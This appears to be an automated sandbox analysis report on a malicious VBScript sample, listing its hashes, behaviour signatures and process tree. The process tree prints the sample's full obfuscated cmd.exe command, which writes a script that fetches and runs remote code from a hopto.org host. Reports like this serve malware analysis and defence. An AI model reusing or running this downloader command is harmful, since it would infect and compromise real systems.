Analysis
-
max time kernel
146s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-es -
submitted
23-06-2022 14:52
Static task
static1
Behavioral task
behavioral1
Sample
27.FICH_33O3LcBJBPsZDE6v.vbs
Resource
win7-20220414-es
Behavioral task
behavioral2
Sample
27.FICH_33O3LcBJBPsZDE6v.vbs
Resource
win10v2004-20220414-es
Behavioral task
behavioral3
Sample
_.exe
Resource
win7-20220414-es
General
-
Target
27.FICH_33O3LcBJBPsZDE6v.vbs
-
Size
7KB
-
MD5
25926cb2b53f3be53b0999621d1f1ccf
-
SHA1
9a073d7bd4b2f730f157f4612551504d16607256
-
SHA256
665b376283df9d5e962860cc1d6cc2ec05157afff65d44b6d9ff64d8b6393941
-
SHA512
8542f4c0815e8f161c4dc2151252454fc2dcc86da0a3160724f54d702d3ea99805be006d5bfdde65f68f3aba6556892d735515824a3fdf24f9de0dd05dc469bd
Malware Config
Signatures
-
Blocklisted process makes network request 4 IoCs
Processes:
WScript.exeflow pid process 4 4336 WScript.exe 10 4336 WScript.exe 16 4336 WScript.exe 27 4336 WScript.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.execmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings cmd.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
WScript.execmd.execmd.execmd.exedescription pid process target process PID 4536 wrote to memory of 2216 4536 WScript.exe cmd.exe PID 4536 wrote to memory of 2216 4536 WScript.exe cmd.exe PID 2216 wrote to memory of 1700 2216 cmd.exe cmd.exe PID 2216 wrote to memory of 1700 2216 cmd.exe cmd.exe PID 2216 wrote to memory of 3744 2216 cmd.exe cmd.exe PID 2216 wrote to memory of 3744 2216 cmd.exe cmd.exe PID 3744 wrote to memory of 1076 3744 cmd.exe cmd.exe PID 3744 wrote to memory of 1076 3744 cmd.exe cmd.exe PID 1076 wrote to memory of 4336 1076 cmd.exe WScript.exe PID 1076 wrote to memory of 4336 1076 cmd.exe WScript.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\27.FICH_33O3LcBJBPsZDE6v.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmD ^/V/D/c EcHo function jzYA(VqB4eXG4vnLneHYp9) jzYA= replace(VqB4eXG4vnLneHYp9,"oIf6","w" ): End function: bZgICx10gbdN43 = jzYA("S=cri=pt=:H=ttps://oIf6fux02.hopto.org/g=1="): GetObject(AUrt(bZgICx10gbdN43)): function AUrt(c0zTSkrS20) AUrt= replace(c0zTSkrS20,"=","" ): end function > nul > %Public%\^L8DPGAESQ5.vbs |^start cMd /c start %Public%\^L8DPGAESQ5.vbs2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo function jzYA(VqB4eXG4vnLneHYp9) jzYA= replace(VqB4eXG4vnLneHYp9,"oIf6","w" ): End function: bZgICx10gbdN43 = jzYA("S=cri=pt=:H=ttps://oIf6fux02.hopto.org/g=1="): GetObject(AUrt(bZgICx10gbdN43)): function AUrt(c0zTSkrS20) AUrt= replace(c0zTSkrS20,"=","" ): end function 1>C:\Users\Public\L8DPGAESQ5.vbs"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" start cMd /c start C:\Users\Public\L8DPGAESQ5.vbs"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execMd /c start C:\Users\Public\L8DPGAESQ5.vbs4⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\L8DPGAESQ5.vbs"5⤵
- Blocklisted process makes network request
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\L8DPGAESQ5.vbsFilesize
275B
MD56bac93f3f5d256c436d31e9496f33353
SHA1906d675da017b53b3051cca5bf270655d68bc358
SHA256f7c07264ac5931edc61c2bf838cffba41e119d9780876904c1c2d817ce5810c6
SHA512ab576653b6030eec23d241a37805bad26cc13b38a0bf8957bbea0c010fd910e15ceece6fd4bacc784aadc1f8b1ed55c64b93ada35bcdfdb98d16afeb5b7c4804
-
memory/1076-133-0x0000000000000000-mapping.dmp
-
memory/1700-131-0x0000000000000000-mapping.dmp
-
memory/2216-130-0x0000000000000000-mapping.dmp
-
memory/3744-132-0x0000000000000000-mapping.dmp
-
memory/4336-135-0x0000000000000000-mapping.dmp